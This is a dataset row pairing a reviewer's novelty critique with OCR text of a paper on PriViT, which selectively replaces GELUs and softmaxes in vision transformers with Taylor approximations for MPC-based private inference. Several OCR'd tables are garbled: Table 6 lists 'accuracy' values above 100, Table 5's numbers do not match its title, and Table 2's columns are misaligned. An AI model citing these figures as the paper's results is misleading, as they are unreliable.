Paper_ID
stringlengths
10
10
Question
stringlengths
201
1.81k
ocr_output
stringlengths
252
54k
8w6FzR68DS
While the paper introduces an interesting approach, its novelty appears constrained. The core concept of utilizing binary gates to manage the number of nonlinear operations through $\ell_0$ sparsity has been proposed introduced in SNL (Cho et al., 2022b). The proposed method seems like an adaptation of SNL for ViTs. This adaptation is intriguing, but a deeper exploration into its unique contributions compared to SNL would provide more clarity on its novelty.
PRiViT: VISION TRANSFORMERS FOR FAST PRIVATE INFERENCE Anonymous authors Paper under double-blind review ABSTRACT The Vision Transformer (ViT) architecture has emerged as the backbone of choice for state-of-the-art deep models for computer vision applications. However, ViTs are ill-suited for private inference using secure multi-party computation (MPC) protocols, due to the large number of non-polynomial operations (self-attention, feed-forward rectifiers, layer normalization). We propose PRiViT, a gradient-based algorithm to selectively “Taylorize” nonlinearities in ViTs while maintaining their prediction accuracy. Our algorithm is conceptually simple, easy to implement, and achieves improved performance over existing approaches for designing MPC-friendly transformer architectures in terms of achieving the Pareto frontier in latency-accuracy. We confirm these improvements via experiments on several standard image classification tasks. 1 INTRODUCTION Motivation. Deep machine learning models are increasingly being deployed by cloud-based providers, accessible only by API calls. In such cases, user data privacy becomes paramount, motivating the setting of private inference (PI) using secure multiparty computation (MPC). In its simplest form, MPC-based private inference is a two-party setup where a user (the first party) performs inference of their data on a model whose weights are owned by the cloud service provider (the second party), with both sides encrypting their inputs using cryptographic techniques prior to inference. The main technical barrier to widespread deployment of MPC-based PI protocols is the large number of nonlinear operations present in a deep neural network model. Private execution of linear (or low-degree polynomial) operations can be made fast using cryptographic protocols like homomorphic encryption and/or secret sharing. However, private execution of nonlinear operations (such as ReLUs or softmax operations) require Yao’s Garbled Circuits, incurring high latency and storage overhead. Thus, unlocking fast, accurate, and efficient PI requires rethinking network design. Consequently, an emerging line of work has made several forays towards the design of “MPC-friendly” models; cf. more discussions below in Section 2. These methods approach PI from different angles. Approaches such as Delphi (Mishra et al., 2020a) or Circa (Ghodsi et al., 2021) propose to replace ReLUs with MPC-friendly approximations, while approaches such as CryptoNAS (Ghodsi et al., 2020) and Sphynx (Cho et al., 2021) use neural architecture search (NAS) to search for network backbones with a minimal number of ReLUs. Peng et al. (2023) propose hardware-aware ReLU-reduced networks to achieve better latencies. The latest approaches in this direction (SNL by Cho et al., 2022a), and SENet by Kundu et al. (2023) derive inspiration from network pruning. However, this body of work has gaps. The overwhelming majority of PI-aware model approaches have focused on convolutional architectures, and have largely ignored transformer models. In particular, the proper application of MPC to vision transformer architectures remains far less studied; see Table 1. Vision transformers (Dosovitskiy et al., 2020) currently list among the best performing deep models in numerous computer vision tasks, spanning image classification, generation, and understanding. On the other hand, vision transformers are very bulky, possessing an enormous number of nonlinear operations of different types: GELUs, softmaxes, and layer norms. As of early September 2023, the only published approach addressing private inference for vision transformers is the MPCViT framework of Zeng et al. (2022); they use a carefully constructed combination of NAS, various simplifications of the attention mechanism, and knowledge distillation (Hinton et al., 2015) to achieve highly competitive results on common image classification benchmarks. Table 1: Comparison of various MPC-friendly approaches for deep image classification. NAS stands for neural architecture search; GD stands for gradient descent. Our approach, PriViT, adaptively replaces various nonlinearities present in transformers with their Taylorized versions in order to reduce PI latency costs without drop in accuracy. | Approach | Arch | Methods | Units removed | |-------------------|------------|--------------------|--------------------------------| | Delphi [Mishra et al., 2020a] | ConvNets | NAS + poly approx. | ReLU layers | | CryptoNAS [Ghodsi et al., 2020] | ResNets | NAS | ReLU layers | | Sphynx [Cho et al., 2021] | ResNets | NAS | ReLU layers | | DeepReDuce [Jha et al., 2021] | ResNets | manual | ReLU layers | | SNL [Cho et al., 2022a] | ResNets | GD | Individual ReLUs | | SENet [Kundu et al., 2023] | ResNets | GD | Individual ReLUs | | MPCFormer [Li et al., 2022] | BERT | NAS + poly approx. | GELU layers, softmaxes | | MPCViT [Zeng et al., 2022] | ViT | NAS + poly approx. | GELU layers, softmaxes | | PriViT (this paper) | ViT | GD + poly approx. | Individual GELUs, softmaxes | Our contributions and techniques. In this paper we introduce PriViT, an algorithm for designing MPC-friendly vision transformers. PriVit considerably improves upon the previous best results for PI using Vision Transformers (MPCViT) both in terms of latency and accuracy on TinyImagenet, and competitive results on CIFAR 10/100. At a high level, our approach mirrors the network linearization strategy introduced in the SNL method by Cho et al. [2022a]. Let us start with a pre-trained ViT model with frozen weights, but now replace nonlinear operations with their switched Taylorized versions: - Each GELU unit, $\text{GELU}(x_i)$ is replaced by $c_i \cdot \text{GELU}(x_i) + (1 - c_i) \cdot x_i$; and - Each row-wise softmax operation $\text{Softmax}(X_i)$ is replaced by $s_i \cdot \text{Softmax}(X_i) + (1 - s_i) \cdot \text{SquaredAttn}(X_i)$. where SquaredAttn is just the unnormalized quadratic kernel, and binary switching variables $c_i$, $s_i$. These switches decide whether to retain the nonlinear operation, or to replace it with its Taylor approximation (linear in the case of GELU, quadratic in the case of softmax). Having defined this new network, we initialize all switch variables to 1, make weights as well as switches trainable, and proceed with training using gradient descent. Some care needs to be taken to make things work. We seek to eventually set most of the switching variables to zero since our goal is to replace most nonlinearities with linear units or low-degree polynomials; the surviving switches should be set to one. We achieve this by augmenting the standard cross-entropy training loss with a $\ell_1$-penalty term that promotes sparsity in the vector of all switch variables, apply a homotopy-style approach that gradually increases this penalty if sufficient sparsity is not reached, and finally binarize the variables via rounding. We can optionally perform knowledge distillation; see Section 5 for details. Discussion and implications. We note that the previous state-of-the-art, MPCViT, also follows a similar strategy as [Cho et al., 2022a]: selectively replace both GELUs and softmax operations in vision transformers with their linear (or polynomial) approximations. However, they achieve this via a fairly complex MPC-aware NAS procedure. A major technical contribution of their work is the identification of a (combinatorial) search space, along with a differentiable objective to optimize over this space. Our PriViT algorithm, on the other hand, is conceptually much simpler and can be applied out-of-the-box to any pre-trained ViT model. The only price to be paid is the computational overhead of training the new switching variables, which incurs extra GPU memory and training time. While our focus in this paper is sharply on private inference, our results also may hold implications on the importance of nonlinearities at various transformer layers. Indeed, we see consistent trends in the architectures obtained via PriViT. First, most nonlinear operations in transformers are redundant. PriViT is able to remove nearly 83% of GELUs and 97% softmax operations with less than 0.5% reduction in accuracy over CIFAR100 [Krizhevsky et al., 2009]. Second, given a target overall budget of softmaxes and GELUs, PriViT overwhelmingly chooses to retain most of the nonlinearities in 1 Via several ablation studies we justify why we choose these particular approximations for these functions. Table 2: Accuracy-latency tradeoffs between PriViT and MPCViT. All latencies are calculated with the Secretflow [Ma et al., 2023] framework using the SEMI2K [Cramer et al., 2018] protocol. Detailed methodology is reported in Appendix A. **Left:** Comparison of PriViT versus MPCViT on TinyImageNet. PriViT achieves 6.6× speedup for isoaccuracy approximately 63%. **Right:** Comparison of PriViT versus MPCViT on CIFAR-100. Due to ViT architecture differences, PriViT uses a much larger model with 3× more input tokens, and is able to achieve nearly percentage points increase in CIFAR-100 accuracy with only 27% increase in latency. Mirroring the MPCViT+ approach, we also report the effect of PriViT with all GELUs replaced with ReLUs, and again show competitive performance. | | PriViT | MPCViT | PriViT (with GELU) | MPCViT | PriViT (with ReLU) | MPCViT+ | |-------|--------|--------|-------------------|--------|-------------------|---------| | Acc | Latency (s) | Acc | Latency (s) | Acc | Latency (s) | Acc | Latency (s) | Acc | Latency (s) | | 78.88 | 31.77 | 62.55 | 150.83 | 78.51 | 17.75 | 77.8 | **9.16** | 78.37 | 16.77 | 77.1 | **9.05** | | 78.16 | 28.45 | 63.7 | 95.75 | 80.49 | 14.21 | 76.9 | 8.76 | 78.73 | 13.46 | 76.8 | 8.77 | | 75.5 | 20.47 | 63.36 | 71.04 | 78.5 | 14.08 | 76.9 | 8.21 | 77.1 | 10.62 | 76.3 | 8.37 | | **64.46** | **14.41** | **62.62** | **43.96** | **77.74** | **11.69** | **76.4** | **7.86** | **76.59** | **12.43** | **76.2** | **7.94** | earlier layers, while discarding most of the later ones. These suggest that there is considerable room for designing better architectures than merely stacking up identical transformer blocks, but we defer a thorough investigation of this question to future work. ## Preliminaries **Private inference.** Prior work on private inference (PI) have proposed methods that leverage existing cryptographic primitives for evaluating the output of deep networks. Cryptographic protocols can be categorized by choice of ciphertext computation used for linear and non-linear operations. Operations are computed using some combination of: (1) secret-sharing (SS) ([Shamir, 1979], [Micali et al., 1987]); (2) partial homomorphic encryptions (PHE) ([Gentry & Halevi, 2011]), which allow limited ciphertext operations (e.g., additions and multiplications), and (3) garbled circuits (GC) ([Yao, 1982; 1986]). In this paper, our focus is exclusively on the Delphi protocol ([Mishra et al., 2020a]) for private inference. We choose Delphi as a matter of convenience: the general trends discovered in our work hold regardless of the encryption protocol, and to validate this we measure latency of our PriViT-derived models using multiple protocols. Delphi assumes the threat model that both parties are honest-but-curious. Therefore, each party strictly follows the protocol, but may try to learn information about the other party’s input based on the transcripts they receive from the protocol. ([Wang et al., 2022], [Peng et al., 2023], [Lu et al., 2021], [Qin et al., 2022]) Delphi is a hybrid protocol that combines cryptographic primitives such as secret sharing (SS) and homomorphic encryptions (HE) for all linear operations, and garbled circuits (GC) for ReLU operations. Delphi divides the inference into two phases to make the private inference happen: the offline phase and an online phase. Delphi’s cryptographic protocol allows for front-loading all input-independent computations to an offline phase. By doing so, this enables ciphertext linear computations to be as fast as plaintext linear computations while performing the actual inference. For convolutional architectures, the authors of Delphi shows empirical evidence that ReLU computation requires 90% of the overall private inference time for typical deep networks. As a remedy, Delphi and SAFENET ([Lou et al., 2021]) propose neural architecture search (NAS) to selectively replace ReLUs with polynomial operations. CryptoNAS ([Ghodsi et al., 2020]), Sphynx ([Cho et al., 2021]) and DeepReDuce ([Jha et al., 2021]) design new ReLU efficient architectures by using macro-search NAS, micro-search NAS and multi-step optimization respectively. **Protocols for nonlinearities.** To standardize across different types of non-linear activations, we compare their Delphi (online) GC computation costs. We use the EMP Toolkit ([Wang et al., 2016]), a widely used GC framework, to generate GC circuits for nonlinear functions. High-performance GC constructions implement AND and XOR gates, where XOR is implemented using FreeXOR ([Kolesnikov & Schneider, 2008]) and AND using Half-Gate ([Zahur et al., 2015]). With FreeXOR, all XOR gates are negligible, therefore we count the number of AND gates as the cost of each nonlinear function ([Mo et al., 2023b]). To be consistent with prior work ([Ghodsi et al., 2021]), the activation functions also consider value recovery from Secret Sharing. Figure 1(left) breaks down the GC cost of ViT for different nonlinearities, and (right) shows the # AND gates in Softmax and GeLU. Figure 2 breaks down softmax into fundamental operations, these operations are already synthesized and included in the EMP Toolkit library. Thus we simply add all the AND gates of these basic operations to arrive at the total number of AND gates of softmax operations. ![Figure 1: Breakdown of latency in ViT-Tiny model of different non-linearities based on Delphi.](image1) ![Figure 2: Detailed steps of benchmarking the non-linearity cost for softmax.](image2) ### 3 PriViT: Privacy Friendly Vision Transformers #### 3.1 Setup Following [Cho et al., 2022a; Ghodsi et al., 2020; Mo et al., 2023a], we exclusively focus on Delphi [Mishra et al., 2020b] as the protocol for private inference. However, we emphasize this choice is only due to convenience, and that our approach extends to any privacy-preserving protocol that relies on reducing nonlinearities to improve PI latency times. Let \( f_W : \mathbb{R}^{n \times d} \rightarrow [0, 1]^C \) be a vision transformer that takes as input \( n \) tokens (each of \( d \) dimensions) and outputs a vector of probabilities for each of \( C \) classes. Each of these tokens is a patch sampled from the original image, \( X \), and is indexed by \( i \). As described, the transformer architecture consists of stacked layers of multi-headed self-attention blocks with nonlinearities like GeLU [Hendrycks & Gimpell, 2016] and Layernorm [Ba et al., 2016]. ViTs use dot-product self-attention (see Equation 1), which additionally consists of \( n \) row-wise softmax operations. \[ o = \frac{\text{Softmax}(XW_q W_k^T X^T)}{\sqrt{d}} XW_o. \] (1) To frame the computational challenges inherent to Vision Transformers (ViTs), consider the ViT-base (12 layer) model designed for \( 224 \times 224 \) images. Delving into its architecture reveals a composition of (approximately) 726,000 GeLUs, 28,000 softmax, and 4000 layer norms. All the non-linearities, when viewed through the lens of the Delphi protocol, become extremely resource-intensive operations. Our PriViT algorithm designs an architecture that circumvents these computationally heavy operations. Our proposition is to surgically introduce appropriate Taylor approximations of the GeLU and softmax attention operations wherever possible (under the constraint that accuracy drops due to such approximations should be minimal. The main challenge is to figure out where to do these approximations, which we describe below. Our algorithm can be viewed as an extension of SNL [Cho et al., 2022b], a network linearization approach. SNL allows for automatic linearization of feed-forward networks through the use of parametric ReLU activations and optimizing a Lasso-like loss [Tibshirani, 1996]. While SNL can reasonably be used to linearize ReLUs (GeLUs) in ViTs, it does not support linearizing softmax operations, which form a large proportion of nonlinearities in ViTs. We therefore add a reparametrized normalization layer that allows a choice between softmax and SQUAREDATTN. Note that this is distinct to many existing approaches [Qin et al., 2022; Lu et al., 2021; Wang et al., 2020; Song, 2021] which also propose blanket alternatives to softmax attention throughout the network. #### 3.2 PriViT Algorithm To begin, we focus on softmax and GeLUs and ignore layernorms; we found that these were far harder to Taylorize. For the former, we introduce auxiliary variables to act as switches. Given \( f_W \), let \( C \) and \( S \) be the total number of GeLUs and softmaxes. Further, let \( S = [s_1, s_2, ..., s_S] \) and \( C = [c_1, c_2, \ldots, c_C] \) be collections of binary switch variables defined for all instances of GeLU and softmax activations. Our goal here is to learn \( W, S, \) and \( C \) to ensure high accuracy with as few nonlinearities as possible. We also use $N$ to denote the number of tokens, $H$ to denote the number of heads and $m$ to denote the size of the token embedding (and consequently the output size of the feedforward MLP). **GELU.** In the case of GELU operations, we define a switched version of the GeLU activation: $$f(c_i, x_i) = c_i \text{GeLU}(x_i) + (1 - c_i)x_i$$ $$y = [f(c_1, x_1), f(c_2, x_2), \ldots, f(c_n, x_n)]$$ where $c_i$ is the corresponding auxiliary variable for the $i^{th}$ token, $x_i$ is the $i^{th}$ input token embedding of dimension $m$ ($m$ being the MLP dimension) and $y \in \mathbb{R}^{N \times m}$ is the output. During training, $c_i$ are initially real-valued, trainable, and are initialized to 1 at the start of training. During inference, we binarize all $c_i$ using an indicator function, $1_{c_i > \epsilon}$, where $\epsilon$ is an appropriately chosen threshold. $c_i = 1$ implies that the GELU is preserved whereas $c_i = 0$ reverts to the linear activation. Figure 13 in the Appendix shows a graphical representation of the GELU parametrization. Note that GELU is a pointwise function and therefore is applied to elementwise. **Softmax Attention.** The next step is to reparameterize softmax attention. However unlike GELUs, choice of parameterization is not obvious here. As per the Delphi protocol, exponents are extremely expensive to calculate. On the other hand, polynomials are comparatively cheaper. Also division by a constant can be folded away compared to division by a number that is input dependent as in the case of softmax. Therefore, we propose a modified ‘Squared Attention’ block; $$\text{SQUAREDATTN}(X) = \frac{(XW_q W_k^T X^T)^2}{N} XW_v,$$ wherein we apply pointwise squaring instead of a row-wise softmax and divide by the number of tokens. Squared attention is MPC friendly for the properties described above, all the while preserving performance compared to original softmax. Similar to our approach with GELUs, we further add a learnable auxiliary variable, $s_i$ for every row-wise softmax operation in the attention layer. $$o = s_i \text{Softmax}(X_i) + (1 - s_i)\text{SQUAREDATTN}(X_i),$$ where $X_i$ is the $i^{th}$ row of the attention matrix. As before, $s_i$s are initially real-valued, trainable and initialized to 1. The variables are binarized during inference allowing use of either Softmax or squared attention based on the values of $s_i$. Further ablations of different candidate attention functions are presented in the results sections. ### 3.3 Training PriVit To train PriVit models, we need to train three sets of variables: the weights of the transformer, $W$, the switch variables for the GELU parameterization, $C$, and the switch variables for the attention parametrization, $S$. Our goal is to train a model that minimizes the number of nonlinearities to satisfy a given nonlinearity budget, that is, $\|C\|_0 < C$, and $\|S\|_0 < S$, while increasing the overall performance. This is reminiscent of standard LASSO-style (Tibshirani, 1996) optimization. We therefore propose the following loss function to train the model, $$L_{privit} = L(f_W(X), y) + \lambda_g \sum_{i=0}^{|G|} |c_i| + \lambda_s \sum_{j=0}^{|S|} |s_j|,$$ where $L$ is the standard cross-entropy loss. We then optimize for each of the variables until the required softmax attention and GELU budgets. We show pseudocode for our training algorithm in Algorithm 1 in the Appendix. Optionally, we can also make use of knowledge distillation during both training and fine-tuning. We introduce a KL divergence loss on the soft labels generated by the teacher and student ViT model. This loss is added to the $L_{privit}$ loss defined in eq. 6. Thus our final minimization objective looks as follows, $$\min_{W,C,S} L(f_W(X), y) + \lambda_g \sum_{i=0}^{|G|} |c_i| + \lambda_s \sum_{j=0}^{|S|} |s_j| + L_{kl}(f_W(X), f_T(X))$$ where $T$ denotes the weights of the teacher model, and $L_{kl}$ is the KL divergence loss. After every epoch, we count the number of GELUs and softmax attention operations by thresholding the $s_i$ and $c_i$ values. Once the model satisfies the required budgets, we freeze the chosen GELUs and softmax attention operations by binarizing all $s_i$ and $c_i$ values and fine-tune the model weights for the classification task. Figure 15 provides a complete illustration. 4 RESULTS 4.1 EXPERIMENTAL SETUP Architecture and dataset. We apply PriViT algorithm to a pretrained checkpoint of ViT-Tiny (Steiner et al., 2021) that is trained on ImageNet-21k (14 million images, 21,843 classes) at resolution $224 \times 224$, and fine-tuned on ImageNet 2012 (1 million images, 1,000 classes) at resolution $224 \times 224$. The pretrained ViT Tiny checkpoints are made available by WinKawaks (2022). In this research work we focus on finetuning an existing model checkpoint like ViT Tiny on a target standard image classification dataset (CIFAR10/100 (Krizhevsky et al., 2009) and Tiny-ImageNet). CIFAR10/100 has images of size $32 \times 32$ while Tiny-ImageNet has $64 \times 64$. These images were resized to $224 \times 224$ before being given as an input. CIFAR10 has 10 classes with 5000 training images and 1000 test images per class. CIFAR100 has 100 classes with 500 training images and 100 test images per class. Tiny-ImageNet has 200 classes with 500 training images and 50 test images per class. We also perform hyperparameter tuning and present more details in Appendix A. ViT teacher pretraining. As the base model, we finetune a pretrained ViT-Tiny on CIFAR10/100 for 10 epochs. We use AdamW (Loshchilov & Hutter, 2017) as the optimizer with an initial learning rate and weight decay as 0.0001 and 0.0001 respectively, and decay the learning rate after every 30 epochs by multiplying it by 0.1. Batch size used is 64. We use the same hyperparameters for the TinyImagenet model as well. We use these weights to initialize PriViT and start KD. Joint optimization of student ViT and parametric non linearities. We use Adam (Kingma & Ba, 2014) optimizer with learning rate equal to 0.0001. We use knowledge distillation and use soft labels generated by the teacher model with a temperature of 4. The total loss is then, $L = L_{priViT} + L_{KL}$, where $L_{priViT}$ is Equation 6 and $L_{KL}$ is the KL divergence loss between the logits of teacher and student model. The Lasso coefficient (Tibshirani, 1996) for parametric attention and GELU mask are set to $\lambda_g = 0.00003$ and $\lambda_s = 0.00003$ respectively at the beginning of the search. We set warmup epochs to 5 during which we don’t change any hyperparameters of the model. Post warmup, we increment $\lambda_g$ by a multiplicative factor of 1.1 at the end of each epoch if the number of active GELUs of current epoch do not decrease by at least 2 as compared to previous epoch. Note that a GELU/softmax is considered active if its corresponding auxiliary variable is greater than threshold hyperparameter $\epsilon = 0.001$. We follow the same approach for $\lambda_s$, with a multiplicative factor of 1.1 and an active threshold of 200. Binarizing parametric nonlinearities, finetuning. When the GELUs and softmax budgets are satisfied, we binarize and freeze the the GELU and softmax auxiliary variables. We subsequently finetune the model for 50 epochs using AdamW with a learning rate 0.0001, weight decay 0.0001 and a cosine annealing learning rate scheduler (Loshchilov & Hutter, 2016). Our finetuning approach continues to use knowledge distillation as before. Non-linearity cost comparison. We conduct experiments to assess the computational cost of non-linear functions such as layernorm, softmax, and GeLU in comparison to ReLU within GC. The detailed results are reported in Table 7 brackets considers amortizing to a vector of inputs, e.g., a Layernorm(192) is an operation over a vector length of 192 is equivalent to $6504 \times$ than the cost of a ReLU. It demonstrates that with a vector length of 197, all layernorm and softmax functions incur higher computational costs (i.e., number of ANDs) than ReLU. Specifically, they exhibit costs $6504 \times$, $18586 \times$ higher than that of ReLU respectively and for pointwise GeLU, we saw a cost $270 \times$ higher than that of ReLU. The cost of denominator of layernorm and softmax can be amortized to the whole vector and thus incur less cost than GeLU. We estimate the latency of each model generated by PriViT using these conversion factors. To show an example, we estimate the non-linearity cost of a hypothetical model with 1000 softmax operation, 1000 layernorm operations and 1000 GELUs, by taking the weighted sum of each operations with their corresponding latency factor. Table 3: Base model architecture of PriViT and MPCViT | Model | Layers | Width | MLP | Heads | Image size | Patch size | params (M) | |------------------------|--------|-------|-----|-------|------------|------------|------------| | PriViT | 12 | 192 | 768 | 3 | 224×224 | 16×16 | 5.8 | | MPCViT (Tiny Imagenet)| 9 | 192 | 384 | 12 | 64×64 | 4×4 | - | | MPCViT (Cifar 10/100) | 7 | 256 | 512 | 4 | 32×32 | 4×4 | 3.72 | Table 4: Comparison of PriViT-R, PriViT-G, and MPCViT over Tiny Imagenet | PriViT - R | PriViT - G | MPCViT | |------------|------------|--------| | Accuracy | Latency (M)| Accuracy | Latency (M) | Accuracy | Latency (M) | | 64.73 | 69.11 | 69.8 | 151.75 | 62.35 | 381.42 | | 61.08 | 67.08 | 66.98 | 150.23 | 63.7 | 337.35 | | 56.83 | 69.28 | 64.46 | 110.60 | 63.36 | 307.45 | | 57.65 | 82.77 | 60.53 | 93.72 | 62.62 | 282.42 | Table 5: Comparison of training efficiency between PriViT and MPCViT on ViT-Tiny | Dataset | PriViT | MPCViT | |-------------|--------|--------| | TinyImagenet| 151.75 | 69.8 | | | 128.23 | 66.98 | | | 130.60 | 70.46 | | CIFAR 100 | 88.24 | 78.5 | | | 77.54 | 77.24 | | | 67.54 | 75.47 | GELU replacement post training. Mirroring the MPCViT+ approach, we also report the effect of PriViT with all GELUs replaced with ReLUs, we call this model PriViT - R, and the original PriViT model as PriViT - G. It is important to note that such an optimization is effective in low GELU budgets as it introduces very minimal errors. In high GELU budgets the error is quite significant that it affects the overall performance. 4.2 Comparison with prior art We benchmark PriViT against MPCViT, using the checkpoints publicly shared by the authors. We use the latency estimates reported in Section 4.1 and report the total latency. Specifically we convert latency contribution of non-linear operations to ReLU equivalents. We refer to the latency of a single RELU operation as ‘RELUOps’ for a given system. We can therefore measure other non-linearities in terms of RELUOps. This proxy has the advantage that it abstracts away system level variables like hardware, memory and bandwidth which often cause variance in benchmarking performance. Table 3 highlights the differences in base model architecture of PriViT and MPCViT. Pareto analysis of PriViT over TinyImagenet, and Cifar10/100. In our evaluation on various datasets, the performance of PriVit was benchmarked against both MPCViT and MPCViT+. We measure two metrics of importance – the latency (measured in terms of RELUOps), and accuracy. An ideal private inference algorithm will achieve high accuracy with low latency. 1. Tiny ImageNet: Using a Pareto analysis on the Tiny ImageNet dataset, PriViT showcases notable improvement. On Tiny imagenet, for an isoaccuracy of approximately 63%, PriViT G and PriViT R achieved 3× and 4.7× speedup compared to MPCViT respectively as reported in Table 4. 2. CIFAR-10: We observe from our results in Figure 3 that in certain latency regimes PriViT performs just as well as MPCViT and slightly worse than MPCViT+ in the trade-off between performance and computational efficiency. 3. CIFAR-100: Turning our attention to the CIFAR-100 dataset, the performance nuances became more evident. PriViT G performs just as well as MPCViT but is slightly worse compared to MPCViT+. However, when benchmarked against PriViT R, PriVit’s performance was much better than MPCViT and MPCViT+, indicating the competitive nature of the two algorithms on this dataset. Table 5 shows that PriViT, at a similar accuracy (64%), requires about half the training epochs compared to MPCViT on TinyImagenet. For an isolatency of 75M on CIFAR 100, PriViT also needs only about 50% of MPCViT’s training epochs. This demonstrates PriViT’s enhanced efficiency and scalability, making it a promising alternative to MPCViT, particularly in situations valuing efficiency and performance. 4.3 Ablation studies Contribution by Knowledge Distillation. In PriViT, we incorporate knowledge distillation (KD) alongside supervised learning. To assess the contribution of KD to the overall performance, we trained PriViT on the TinyImagenet dataset with varying non-linearity budgets. We then compared its Figure 3: Comparison of PriViT over CIFAR 10/100 benchmarked against MPCViT, and MPCViT+. The latency is calculated as per Section 4.1. Table 6: Latency comparison between PriViT and PriViT w/o Pretrain | Latency (M) | PriViT Accuracy (%) | PriViT w/o pretrain Accuracy (%) | |-------------|---------------------|----------------------------------| | 27.98 | 75.5 | 234.18 | | 151.74 | 69.98 | 54.6 | | 128.23 | 66.98 | 167.20 | | 93.71 | 60.53 | 183.31 | Table 7: Non-linearity cost normalized to the cost of one ReLuOp which is 1 ReLU operation over a scalar value. | Function | # ReluOps | Function | # ReluOps | Function | # ReluOps | |--------------|-----------|--------------|-----------|--------------|-----------| | Softmax(197) | 18586 | ReLU Softmax(257) | 4428 | ReLU Softmax(65) | 1133 | | Layernorm(192) | 6504 | Layernorm(192) | 6504 | Layernorm(256) | 8614 | | GeLU(1) | 270 | GeLU(1) | 270 | GeLU(1) | 270 | | x^2(197) | 3248 | | | | | Performance to a version of PriViT (as outlined in Figure 15) that does not employ a teacher model for knowledge distillation. Our results in figure 4 indicate that, under identical latency conditions, incorporating KD enhances performance by approximately 5%. Figure 4: We evaluated PriViT with and without KD. The x axis represents latency measured as per Section 4.1 while the y axis shows the accuracy on TinyImagenet. We observe an overall improvement in the latency-accuracy curve motivating the use of KD. Contribution of pretraining. In PriViT, we utilize a pretrained checkpoint, which is subsequently fine-tuned. Post fine-tuning, we introduce a parametric GeLU and attention mechanisms to decrease non-linearities in the model. To gauge the impact of using a pretrained model on the overall performance, we contrast the performance of PriViT with a variant of PriViT that is not built upon a pretrained model. Instead, this variant employs weights initialized from scratch and is trained with the same parametric non-linearity mask as used in PriViT to minimize non-linearities. The comparative outcomes of these approaches are presented in Table 6. Our findings reveal that, for comparable latencies, PriViT with the pretrained checkpoint outperforms its counterpart without it, registering a 14% enhancement in accuracy. Choice of softmax approximation. To highlight the contribution of different attention candidate, we run PriViT over different softmax budget over CIFAR100, and report the accuracy of the resulting model versus the number of original softmax attention retained. Lower number of softmax operations implies higher the number of softmax attention replaced with our candidate attention operation. As per Figure 5, we see almost no performance drop for SQUAREDATTN, roughly 5% drop in performance for SCALEATTN and 10% drop in performance for UNIFORMATTN in low budgets. Table 8: Comparing PriViT and layerwise linearization of GeLU in a ViT model with 200k GeLUs. Six models were generated by replacing two GeLU layers at a time with Identity. | Layerwise GeLU linearizing | Pri-ViT | |-----------------------------|---------| | Gelu (K) | Acc (%) | Gelu (K) | Acc (%) | | 197 | 96.07 | 200 | 95.59 | | 193 | 95.91 | 150 | 95.34 | | 187 | 94.28 | 100 | 95.58 | | 181 | 93.33 | 50 | 94.98 | | 174 | 93.54 | 10 | 94.24 | | 164 | 92.06 | 1 | 93.96 | | 123 | 82.48 | | | | 0 | 56.64 | | | Thus SquaredAttention outperformed the others across all softmax budgets, motivating its selection to replace the standard softmax attention in PriViT. **Fine-grained versus layer-wise Taylorization** PriVit employs a unique approach where it selectively Taylorizes softmax and GELU operations. To probe the effectiveness of this method, we contrasted it with an alternative PriViT approach that Taylorizes a ViT model progressively, layer by layer. As illustrated in Table 8, our observations underscored the superiority of selective Taylorization. **Visualization of non-linearity distribution.** To understand which nonlinearities are preserved, we investigate the distribution of PriViT models under different softmax and GELU budgets. From our observations in Figure 6, we can conclude that GELUs in earlier encoder layers are preferred over the ones in the later layers. From figure 7, we observe a similar trend in softmax distributions. We find this interesting, since the trends reported in earlier work on convolutional networks are in the reverse direction: earlier layers tend to have a larger number of linearized units. Understanding this discrepancy is an interesting question for future work. Figure 6: Comparison of GELU distribution between ViT-base (Base) and PriViT without softmax linearization. The x-axis represents the model’s layer index, while the y-axis shows log-scaled GELU operations per layer. With an input tensor size of $197 \times 3072$ for the GELU layer, each layer contains $197 \times 3072 = 605184$ GELU operations. **Top:** 150K target GELU. **Bottom:** 500K target GELU. Figure 7: Comparison of softmax distribution in ViT-base model (Base) versus PriViT without GeLU linearization. The x-axis denotes the layer index, while the y-axis shows the softmax operations per layer. With a $197 \times 197$ attention matrix across 12 heads, the ViT-base model totals 2364 softmax operations per layer. Notably, PriViT tends to substitute earlier layer softmaxes with linear operations. **Top:** 1K target softmax; **Bottom:** 10K target softmax. ## 5 Conclusion We introduce PriViT, a new algorithm for designing MPC-friendly vision transformers, and showed its competitive performance on several image classification benchmarks. A natural direction of future work is to extend similar techniques for designing other families of transformer architectures, such as Swin Transformers and Data Efficient image transformers (DEiT), as well as encoder-decoder transformer architectures. A key limitation of PriViT is its inability to Taylorize layernorms without introducing instability in the training. REFERENCES Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Minsu Cho, Zahra Ghodsi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Sphynx: Relu-efficient network design for private inference. *arXiv preprint arXiv:2106.11755*, 2021. Minsu Cho, Ameya Joshi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Selective network linearization for efficient private inference. In *International Conference on Machine Learning*, pp. 3947–3961. PMLR, 2022a. Minsu Cho, Ameya Joshi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Selective network linearization for efficient private inference. In Kamalika Chaudhuri, Stefanie Jegelka, Le Song, Csaba Szepesvari, Gang Niu, and Sivan Sabato (eds.), *Proceedings of the 39th International Conference on Machine Learning*, volume 162 of *Proceedings of Machine Learning Research*, pp. 3947–3961. PMLR, 17–23 Jul 2022b. URL https://proceedings.mlr.press/v162/cho22a.html. Ronald Cramer, Ivan Damgård, Daniel Escudero, Peter Scholl, and Chaoping Xing. Spd: efficient mpc mod for dishonest majority. In *Annual International Cryptology Conference*, pp. 769–798. Springer, 2018. Ekin D Cubuk, Barret Zoph, Jonathon Shlens, and Quoc V Le. Randaugment: Practical automated data augmentation with a reduced search space. In *Proceedings of the IEEE/CVF conference on computer vision and pattern recognition workshops*, pp. 702–703, 2020. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2020. Craig Gentry and Shai Halevi. Implementing gentry’s fully-homomorphic encryption scheme. In *Annual international conference on the theory and applications of cryptographic techniques*, pp. 129–148. Springer, 2011. Zahra Ghodsi, Akshaj Kumar Veldanda, Brandon Reagen, and Siddharth Garg. Cryptonas: Private inference on a relu budget. In *Adv. Neural 